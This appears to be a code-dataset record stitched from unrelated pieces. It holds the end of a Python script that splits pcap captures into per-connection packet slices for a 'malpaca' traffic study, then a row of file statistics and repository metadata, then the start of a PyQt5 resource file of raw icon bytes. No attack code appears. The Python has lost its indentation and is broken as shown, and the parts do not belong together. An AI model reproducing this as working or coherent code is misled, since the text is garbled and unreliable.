csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(window_dic) > 0:
row_list = []
for index, (address, amount_windows) in enumerate(window_dic.items()):
#src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos
src_ip = str(address[0]).strip()
dst_ip = str(address[1]).strip()
ip_protocol = str(address[2]).strip()
src_port = str(address[3]).strip()
dst_port = str(address[4]).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
for window_index in range(0, amount_windows):
new_row = row.copy()
new_row["connection_length"] = window_size
new_row["window"] = window_index
row_list.append(new_row)
combined_df = pd.concat(row_list)
file_packet_dic.clear()
window_dic.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df = combined_df.sort_values(by=["src_ip", "dst_ip", "ip_protocol", "src_port", "dst_port", "window"], ascending=True)
combined_df.to_csv(new_csv_file_path, index=False)
@staticmethod
def split_connection_into_X_equal_parts_for_malpaca(threshold, parts, folder_to_filtered_files, folder_to_move_data_to, old_file_addition):
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
threshold = int(threshold)
parts = int(parts)
new_folder_name = folder_to_move_data_to + "/" + str(threshold) + "_threshold_" + str(parts) + "_parts"
os.mkdir(new_folder_name)
for piece in range(1, (parts + 1)):
new_folder = new_folder_name + "/" + str(threshold) + "_threshold_" + str(piece) + "_part"
os.mkdir(new_folder)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
parts_list = []
for part in range(parts):
parts_list.append([])
file_packet_dic = {}
connections_used = []
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
for address, packets_value in file_packet_dic.items():
len_connection = len(packets_value)
if len_connection >= (threshold * parts):
connections_used.append(address)
remainder = len_connection - (threshold * parts)
to_skip_packets = math.floor((remainder / (parts - 1)))
one_move = threshold + to_skip_packets
one_to_last_packet = one_move * (parts - 1)
index = 0
for start_value in range(0, one_to_last_packet, one_move):
packet_slice = packets_value[start_value:(start_value + threshold)]
parts_list[index].append(packet_slice)
index = index + 1
parts_list[index].append(packets_value[-threshold:])
summary_df = pd.read_csv(path_to_csv_file)
if len(connections_used) > 0:
for connection_index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
one_file_df = summary_df[(summary_df["src_ip"] == src_ip) & (summary_df["dst_ip"] == dst_ip) & (summary_df["ip_protocol"] == ip_protocol) & (summary_df["src_port"] == src_port) & (summary_df["dst_port"] == dst_port)]
one_file_df["connection_length"] = threshold
if connection_index == 0:
combined_df = one_file_df
else:
combined_df = combined_df.append(one_file_df)
for part_index, part in enumerate(parts_list):
new_file_path = folder_to_move_data_to + "/" + str(threshold) + "_threshold_" + str(parts) + "_parts/" + str(threshold) + "_threshold_" + str(part_index + 1) + "_part/" + scenario_name + "_" + file_name
csv_summary_path = folder_to_move_data_to + "/" + str(threshold) + "_threshold_" + str(parts) + "_parts/" + str(threshold) + "_threshold_" + str(part_index + 1) + "_part/" + scenario_name + "_" + file_name + "_summary.csv"
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for packet in part:
pktdump.write(packet)
pktdump.close()
combined_df.to_csv(csv_summary_path, index=False)
| 48.612512 | 242 | 0.498022 | 5,683 | 52,064 | 4.207109 | 0.034313 | 0.054582 | 0.029905 | 0.015475 | 0.915806 | 0.906981 | 0.902464 | 0.900247 | 0.897068 | 0.89368 | 0 | 0.005024 | 0.395974 | 52,064 | 1,070 | 243 | 48.657944 | 0.755247 | 0.001056 | 0 | 0.878427 | 0 | 0 | 0.057607 | 0.000481 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007151 | false | 0 | 0.028605 | 0 | 0.036949 | 0.060787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7e10a5950fa6140f2ecbefd55a2cae251838ed39 | 19,215 | py | Python | include/resources.py | Resavin/NotationCalculator | d4d8d52ac6f25befe5d529d181ab47d4235e37c7 | [
"MIT"
] | null | null | null | include/resources.py | Resavin/NotationCalculator | d4d8d52ac6f25befe5d529d181ab47d4235e37c7 | [
"MIT"
] | 2 | 2021-12-22T21:17:45.000Z | 2021-12-22T22:28:55.000Z | include/resources.py | Resavin/NotationCalculator | d4d8d52ac6f25befe5d529d181ab47d4235e37c7 | [
"MIT"
] | 2 | 2021-12-22T21:08:21.000Z | 2021-12-22T21:16:57.000Z | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x10\xbe\
\x00\
\x00\x01\x00\x01\x00\x20\x20\x00\x00\x01\x00\x20\x00\xa8\x10\x00\
\x00\x16\x00\x00\x00\x28\x00\x00\x00\x20\x00\x00\x00\x40\x00\x00\
\x00\x01\x00\x20\x00\x00\x00\x00\x00\x80\x10\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\
\x11\x09\x09\x09\x1a\x06\x06\x06\x26\x1f\x1f\x1f\x30\x1b\x1b\x1b\
\x2e\x07\x07\x07\x23\x0a\x0a\x0a\x19\x00\x00\x00\x10\x00\x00\x00\
\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x02\x00\x00\x00\x11\x39\x39\x39\x35\xa6\xa6\xa6\x81\xcf\xcf\xcf\
\xbc\xe2\xe2\xe2\xe5\xf0\xf0\xf0\xfa\xf6\xf6\xf6\xff\xf5\xf5\xf5\
\xfe\xee\xee\xee\xf6\xdf\xdf\xdf\xdd\xc9\xc9\xc9\xb0\x92\x92\x92\
\x71\x1f\x1f\x1f\x29\x00\x00\x00\x0e\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0d\x53\x53\x53\
\x40\xc7\xc7\xc7\xaf\xf3\xf3\xf3\xf8\xff\xff\xff\xff\xfc\xfb\xfc\
\xff\xd9\xd1\xd7\xff\xba\xac\xb7\xff\xab\x9a\xa8\xff\xad\x9d\xaa\
\xff\xbf\xb2\xbd\xff\xe3\xdd\xe2\xff\xfe\xfe\xfe\xff\xfe\xfe\xfe\
\xff\xea\xea\xea\xef\xb6\xb6\xb6\x97\x2c\x2c\x2c\x2e\x00\x00\x00\
\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x02\x09\x09\x09\x1b\xaa\xaa\xaa\x8d\xf2\xf2\xf2\
\xf7\xff\xff\xff\xff\xd0\xc6\xce\xff\x79\x5d\x73\xff\x38\x10\x30\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x44\x1e\x3c\xff\x8b\x74\x86\
\xff\xe3\xde\xe2\xff\xff\xff\xff\xff\xe9\xe9\xe9\xe9\x8b\x8b\x8b\
\x6a\x00\x00\x00\x15\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x03\x25\x25\x25\x29\xcd\xcd\xcd\xbf\xfe\xfe\xfe\xff\xe4\xdf\xe3\
\xff\x6a\x4c\x64\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2f\x04\x26\xff\x88\x70\x83\xff\xf4\xf2\xf4\xff\xf9\xf9\xf9\
\xfd\xb0\xb0\xb0\x98\x09\x09\x09\x1b\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x26\x26\x26\
\x28\xd7\xd7\xd7\xcc\xff\xff\xff\xff\xbe\xb1\xbc\xff\x37\x0f\x2f\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x4b\x26\x43\xff\xdd\xd6\xdb\
\xff\xfd\xfd\xfd\xff\xba\xba\xba\xa3\x09\x09\x09\x1a\x00\x00\x00\
\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x0a\x0a\x19\xc9\xc9\xc9\
\xbb\xff\xff\xff\xff\xb2\xa2\xaf\xff\x2d\x03\x24\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x3b\x13\x32\
\xff\xd7\xcf\xd5\xff\xfd\xfd\xfd\xfe\xa8\xa8\xa8\x8a\x00\x00\x00\
\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x0c\xa4\xa4\xa4\x84\xfd\xfd\xfd\
\xff\xc8\xbd\xc5\xff\x2e\x04\x26\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x3f\x18\x37\xff\xe9\xe4\xe8\xff\xf6\xf6\xf6\xfa\x70\x70\x70\
\x54\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x02\x45\x45\x45\x37\xef\xef\xef\xf3\xf0\xed\xef\
\xff\x3f\x18\x37\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x63\x43\x5c\xff\xfe\xfe\xfe\xff\xda\xda\xda\
\xd4\x08\x08\x08\x1f\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x0e\xbe\xbe\xbe\xa2\xff\xff\xff\xff\x85\x6c\x80\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2c\x01\x23\xff\xaf\x9f\xac\xff\x4a\x26\x43\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xb7\xa9\xb4\xff\xfd\xfd\xfd\
\xff\x90\x90\x90\x6f\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\
\x00\x25\x25\x25\x29\xee\xee\xee\xf2\xeb\xe7\xea\xff\x31\x07\x28\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xc9\xbe\xc7\xff\x8c\x74\x87\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x4f\x2c\x48\xff\xfe\xfe\xfe\
\xff\xd6\xd6\xd6\xcb\x09\x09\x09\x1a\x00\x00\x00\x00\x00\x00\x00\
\x05\x93\x93\x93\x70\xfe\xfe\xfe\xff\x9c\x88\x98\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x70\x53\x6a\xff\x68\x49\x61\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x8f\x78\x8a\xff\xc6\xbb\xc4\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xce\xc4\xcc\
\xff\xf7\xf7\xf7\xfc\x3f\x3f\x3f\x3c\x00\x00\x00\x05\x00\x00\x00\
\x0e\xc6\xc6\xc6\xac\xff\xff\xff\xff\x5c\x3b\x55\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x54\x31\x4d\xff\xf8\xf7\xf8\
\xff\x33\x09\x2a\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x8d\x77\x89\
\xff\xff\xff\xff\xff\x9e\x9e\x9e\x79\x00\x00\x00\x0a\x0b\x0b\x0b\
\x16\xdb\xdb\xdb\xd6\xfb\xfa\xfb\xff\x30\x07\x28\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2c\x01\x23\xff\xec\xe9\xec\
\xff\x67\x48\x60\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xa4\x92\xa0\
\xff\xc3\xb7\xc1\xff\xc3\xb7\xc1\xff\xc3\xb7\xc1\xff\xa6\x94\xa2\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x5e\x3e\x57\
\xff\xff\xff\xff\xff\xc2\xc2\xc2\xa4\x00\x00\x00\x11\x08\x08\x08\
\x1d\xe7\xe7\xe7\xef\xe2\xdc\xe1\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x32\x09\x2a\xff\x32\x09\x2a\xff\x32\x09\x2a\
\xff\xcc\xc1\xc9\xff\xba\xac\xb7\xff\x32\x09\x2a\xff\x32\x09\x2a\
\xff\x32\x09\x2a\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xb3\xa4\xb0\
\xff\xa1\x8e\x9d\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xb4\xa4\xb0\
\xff\xd6\xce\xd5\xff\xd6\xce\xd5\xff\xd6\xce\xd5\xff\xb5\xa6\xb2\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x40\x19\x38\
\xff\xff\xff\xff\xff\xd2\xd2\xd2\xbf\x00\x00\x00\x16\x07\x07\x07\
\x24\xef\xef\xef\xf8\xd3\xcb\xd2\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x39\x11\x31\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\
\xff\xfb\xfb\xfb\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x79\x5d\x73\
\xff\xdc\xd5\xda\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x31\x07\x28\
\xff\xff\xff\xff\xff\xd8\xd8\xd8\xcd\x0a\x0a\x0a\x19\x07\x07\x07\
\x23\xee\xee\xee\xf8\xd4\xcb\xd2\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x30\x06\x27\xff\x7c\x61\x76\xff\x7c\x61\x76\xff\x7c\x61\x76\
\xff\xde\xd7\xdc\xff\xd3\xca\xd1\xff\x7c\x61\x76\xff\x7c\x61\x76\
\xff\x7a\x60\x75\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x3f\x18\x37\
\xff\xfd\xfd\xfd\xff\x42\x1c\x3a\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x32\x08\x29\
\xff\xff\xff\xff\xff\xd8\xd8\xd8\xcc\x00\x00\x00\x18\x08\x08\x08\
\x1d\xe6\xe6\xe6\xee\xe4\xdf\xe3\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xd8\xd0\xd6\xff\x7c\x62\x77\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x42\x1b\x3a\
\xff\xff\xff\xff\xff\xd1\xd1\xd1\xbe\x00\x00\x00\x16\x00\x00\x00\
\x15\xda\xda\xda\xd3\xfc\xfb\xfc\xff\x32\x09\x2a\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x9d\x89\x99\xff\xb7\xa8\xb4\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x61\x41\x5b\
\xff\xff\xff\xff\xff\xc1\xc1\xc1\xa1\x00\x00\x00\x10\x00\x00\x00\
\x0d\xc3\xc3\xc3\xa8\xff\xff\xff\xff\x60\x40\x59\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xa3\x90\x9f\xff\x95\x80\x91\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x62\x43\x5c\xff\xef\xec\xee\xff\x2d\x02\x24\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x92\x7c\x8d\
\xff\xff\xff\xff\xff\x99\x99\x99\x74\x00\x00\x00\x0a\x00\x00\x00\
\x05\x8d\x8d\x8d\x6a\xfe\xfe\xfe\xff\xa2\x90\x9e\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x31\x07\x28\xff\xf6\xf4\xf6\xff\x57\x36\x50\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xd4\xcb\xd2\
\xff\xf5\xf5\xf5\xfb\x37\x37\x37\x37\x00\x00\x00\x05\x00\x00\x00\
\x00\x1b\x1b\x1b\x25\xe9\xe9\xe9\xef\xef\xec\xef\xff\x34\x0b\x2c\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\xc1\xb5\xbf\xff\x92\x7c\x8d\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x57\x34\x4f\xff\xfe\xfe\xfe\
\xff\xd2\xd2\xd2\xc5\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x0d\xb7\xb7\xb7\x9a\xff\xff\xff\xff\x8f\x78\x8a\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x3e\x16\x35\xff\x41\x1b\x39\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xc0\xb4\xbe\xff\xfd\xfd\xfd\
\xff\x87\x87\x87\x66\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x02\x35\x35\x35\x30\xec\xec\xec\xee\xf4\xf2\xf4\
\xff\x46\x20\x3e\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x6e\x50\x68\xff\xff\xff\xff\xff\xd5\xd5\xd5\
\xcc\x09\x09\x09\x1c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x9a\x9a\x9a\x77\xfc\xfc\xfc\
\xfe\xd2\xc9\xd0\xff\x32\x09\x29\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x47\x22\x3f\xff\xef\xec\xee\xff\xf3\xf3\xf3\xf7\x63\x63\x63\
\x4a\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
